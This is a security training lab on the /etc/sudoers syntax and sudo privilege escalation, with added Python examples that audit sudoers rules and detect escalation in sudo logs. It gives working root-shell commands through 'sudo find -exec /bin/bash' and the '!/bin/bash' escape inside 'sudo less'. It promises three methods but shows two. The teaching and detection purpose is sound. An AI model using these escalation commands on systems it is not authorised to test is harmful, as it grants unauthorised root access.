Introduction
In this lab, you will learn about the sudo configuration file syntax and practice three common methods to escalate privileges through sudo vulnerabilities or misconfigurations. The goal is to gain a better understanding of how to leverage sudo for privilege escalation during a penetration test.
Sudo Configuration File Syntax
In this step, you will learn about the syntax of the /etc/sudoers file, which is used to configure sudo privileges.
The /etc/sudoers file is used to specify which users or groups can run commands with elevated privileges. To view and save the contents of the /etc/sudoers file, run the following command:
sudo cat /etc/sudoers | grep root > /home/labex/project/sudoers.txt
The output should look similar to the following:
## This file MUST be edited with the 'visudo' command as root.
## This preserves proxy settings from user environments of root
## While you shouldn't normally run git as root, you need to with etckeeper
## Per-user preferences; root won't have sensible values for them.
root ALL=(ALL:ALL) ALL
## Members of the admin group may gain root privileges
The line root ALL=(ALL:ALL) ALL specifies that the root user can run any command as any user or group on all hosts.
The general syntax for a sudoers entry is:
user_or_group_name host_list=(run_as_user:run_as_group) command_list
user_or_group_name: The user or group to whom the rule applies (a leading % marks a group).
host_list: The host(s) on which the rule applies. The value ALL means all hosts.
run_as_user: The user whose privileges are used to run the command. The value ALL means any user.
run_as_group: The group whose privileges are used to run the command. The value ALL means any group.
command_list: The command(s) that the user or group is allowed to run.
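The following parser is an added example and not part of the original lab; it reads sudoers entries written in the syntax described above, splits each into the fields named (user or group, host list, run-as user and group, tags such as NOPASSWD, command list), and flags entries that grant the two programs this lab goes on to abuse. The sample sudoers text is constructed for the example; the set of flagged programs is an assumption you would extend from your own baseline.

```python
import re
from dataclasses import dataclass

# Constructed sample sudoers content; it mirrors the layout shown on the page, not a real host's file.
SAMPLE_SUDOERS = """\
## This file MUST be edited with the 'visudo' command as root.
Defaults env_reset
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
user001 ALL=(root) NOPASSWD: /usr/bin/find
user002 ALL=(root) NOPASSWD: /bin/less /var/log/messages
"""

# user_or_group_name host_list=(run_as_user:run_as_group) [TAG:] command_list
ENTRY_RE = re.compile(
    r"^(?P<who>\S+)\s+"              # user_or_group_name (a leading % marks a group)
    r"(?P<hosts>[^=\s]+)\s*=\s*"     # host_list
    r"(?:\((?P<runas>[^)]*)\))?\s*"  # optional (run_as_user:run_as_group)
    r"(?P<cmds>.+)$"                 # command_list, possibly prefixed by tags such as NOPASSWD:
)

# Programs with a built-in way to run another command; this lab uses find and less.
# Assumption for the example: extend this set from your own review of the host's sudo rules.
SHELL_ESCAPE_PROGRAMS = {"find", "less"}


@dataclass
class SudoersEntry:
    who: str
    is_group: bool
    hosts: list
    run_as_user: str
    run_as_group: str
    nopasswd: bool
    commands: list


def parse_entry(line):
    """Parse one user specification line; return None if it does not match the syntax."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        return None
    runas = m.group("runas") or "root"  # sudo defaults to root when no (run_as) part is given
    run_user, _, run_group = runas.partition(":")
    cmds = m.group("cmds").strip()
    nopasswd = False
    # Peel off tag prefixes (NOPASSWD:, PASSWD:, ...) from the front of the command list.
    while True:
        tag = re.match(r"^([A-Z]+):\s*", cmds)
        if not tag:
            break
        if tag.group(1) == "NOPASSWD":
            nopasswd = True
        cmds = cmds[tag.end():]
    who = m.group("who")
    return SudoersEntry(
        who=who.lstrip("%"),
        is_group=who.startswith("%"),
        hosts=m.group("hosts").split(","),
        run_as_user=run_user or "root",
        run_as_group=run_group,
        nopasswd=nopasswd,
        commands=[c.strip() for c in cmds.split(",")],
    )


def parse_sudoers(text):
    """Parse user specification lines, skipping comments, blanks and Defaults lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        entry = parse_entry(line)
        if entry:
            entries.append(entry)
    return entries


def audit(entries):
    """Return (who, command, nopasswd) for rules that hand out a shell-escape-capable program."""
    findings = []
    for e in entries:
        for cmd in e.commands:
            program = cmd.split()[0].rsplit("/", 1)[-1]
            if program in SHELL_ESCAPE_PROGRAMS:
                findings.append((e.who, cmd, e.nopasswd))
    return findings


if __name__ == "__main__":
    for who, cmd, nopasswd in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{who}: {cmd} (NOPASSWD={nopasswd})")
```

The audit deliberately looks at the program, not at whether arguments are restricted: as the next two steps show, pinning the argument list (less /var/log/messages) does not help when the program itself can launch another command.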
Sudo Enables Privilege Escalation Without Argument Restrictions
In this step, you will practice escalating privileges by taking advantage of sudo misconfigurations that allow running any command with elevated privileges.
First, open a terminal and navigate to the /home/labex/project directory:
cd /home/labex/project
Initialize the environment by running the following command:
./env_setup_1.sh
You are now logged in as the user001 user. Use the sudo -l command to check your sudo privileges:
sudo -l
(root) NOPASSWD: /usr/bin/find
This means you can run the find command with root privileges without a password. To escalate privileges, run:
sudo find /home -exec /bin/bash \;
You should now have a root shell. Create a file named success_1.txt in the /root directory to verify that you have root privileges:
echo "success_1" | sudo tee /root/success_1.txt
Verify the file by running:
cat /root/success_1.txt
The output should be success_1.
Sudo Enables Privilege Escalation with Specific Command Arguments
In this step, you will practice escalating privileges by taking advantage of sudo misconfigurations that allow running specific commands with elevated privileges.
After the last step you are still logged in as the root user. To continue with this step, close the current terminal and open a new one.
First, open a terminal and navigate to the /home/labex/project directory:
cd /home/labex/project
Initialize the environment by running the following command:
./env_setup_2.sh
Check your sudo privileges with sudo -l:
sudo -l
Expected output:
(root) NOPASSWD: /bin/less /var/log/messages
This means you can run the command /bin/less /var/log/messages with root privileges without a password. To escalate privileges, run:
sudo less /var/log/messages
Once inside the less pager, run:
!/bin/bash
You should now have a root shell. Create a file named success_2.txt in the /root directory to verify that you have root privileges:
echo "success_2" | sudo tee /root/success_2.txt
Verify the file by running:
cat /root/success_2.txt
The output should be success_2.
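Both escalation steps above leave a trace in sudo's own log, but of different quality: the find -exec invocation records the spawned shell in the logged COMMAND, whereas the less escape does not, because sudo only logs the command it authorized (/bin/less /var/log/messages) and never sees the !/bin/bash typed inside the pager. The detector below is an added example, not part of the lab, that reads sudo syslog lines in sudo's default "user : TTY= ; PWD= ; USER= ; COMMAND=" format and applies one rule per case; the log lines, host name and paths are constructed for the example, and the program sets are assumptions to be extended from your own baseline.

```python
import re

# Constructed sample syslog lines in sudo's default log format (host name, times and paths are made up).
SAMPLE_LOG = """\
Jun  1 10:00:01 lab sudo: user001 : TTY=pts/0 ; PWD=/home/labex/project ; USER=root ; COMMAND=/usr/bin/find /home -exec /bin/bash \\;
Jun  1 10:00:05 lab sudo:     root : TTY=pts/0 ; PWD=/home/labex/project ; USER=root ; COMMAND=/usr/bin/tee /root/success_1.txt
Jun  1 10:05:00 lab sudo: user002 : TTY=pts/1 ; PWD=/home/labex/project ; USER=root ; COMMAND=/bin/less /var/log/messages
Jun  1 10:06:00 lab sudo: user003 : TTY=pts/2 ; PWD=/home/user003 ; USER=root ; COMMAND=/usr/bin/apt update
"""

SUDO_LINE_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# Assumed sets for the example: shells whose appearance under sudo is itself the alert,
# and pagers whose shell escape sudo cannot see (this lab uses less).
SHELLS = {"bash", "sh", "dash", "zsh"}
ESCAPE_PAGERS = {"less"}


def basename(path):
    return path.rsplit("/", 1)[-1]


def classify(cmd):
    """Return (severity, reason) for a logged COMMAND string, or None if it looks benign."""
    argv = cmd.split()
    if not argv:
        return None
    program = basename(argv[0])
    # Case 1 (step "without argument restrictions"): find -exec / -execdir launching a shell.
    # The shell is part of the authorized command line, so sudo logs it verbatim.
    for i, arg in enumerate(argv[:-1]):
        if arg in ("-exec", "-execdir") and basename(argv[i + 1]) in SHELLS:
            return ("high", "root shell spawned via find -exec")
    if program in SHELLS:
        return ("high", "interactive root shell requested directly")
    # Case 2 (step "with specific command arguments"): the logged command is only the pager.
    # Whether !/bin/bash was typed inside it must come from auditd/process ancestry, not this log.
    if program in ESCAPE_PAGERS:
        return ("medium", "pager with a built-in shell escape; sudo does not log the "
                          "'!command' run inside less, confirm via process tree or auditd")
    return None


def detect(log_text):
    """Parse sudo syslog lines and return one finding per suspicious invocation."""
    findings = []
    for line in log_text.splitlines():
        m = SUDO_LINE_RE.search(line)
        if not m:
            continue
        verdict = classify(m.group("cmd"))
        if verdict:
            findings.append({
                "user": m.group("user"),
                "runas": m.group("runas"),
                "command": m.group("cmd"),
                "severity": verdict[0],
                "reason": verdict[1],
            })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['user']} -> {f['runas']}: {f['command']} ({f['reason']})")
```

The practical lesson for the detection side is the asymmetry between the two rules: a rule that keys on the COMMAND field alone catches the find case but can only raise a "look closer" signal for less, so a sudo rule that exposes a pager should be paired with a second data source (auditd execve records or a process-ancestry check for a shell whose parent is less running as root).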
Summary
In this lab, you learned about the syntax of the /etc/sudoers file and how to configure sudo privileges. You also practiced three common methods to escalate privileges through sudo misconfigurations or vulnerabilities. By understanding how to leverage sudo for privilege escalation, you can better assess and mitigate potential security risks in Linux systems.